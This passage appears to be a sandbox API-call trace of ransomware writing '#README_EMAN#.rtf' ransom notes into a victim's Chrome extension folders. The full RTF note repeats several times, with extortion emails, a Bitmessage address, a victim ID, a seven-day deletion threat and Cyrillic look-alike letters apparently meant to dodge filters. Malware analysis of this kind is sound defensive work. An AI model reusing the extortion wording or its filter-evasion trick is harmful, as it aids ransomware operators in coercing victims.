br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0286.385] WriteFile (in: hFile=0x2f0, lpBuffer=0x2468d38*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2468d38*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.385] CloseHandle (hObject=0x2f0) returned 1 [0286.386] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\#readme_eman#.rtf")) returned 0x20 [0286.386] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\#readme_eman#.rtf")) returned 0x20 [0286.388] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\#readme_eman#.rtf")) returned 0xffffffff [0286.388] GetLastError () returned 0x2 [0286.388] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0286.388] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.388] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.389] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is 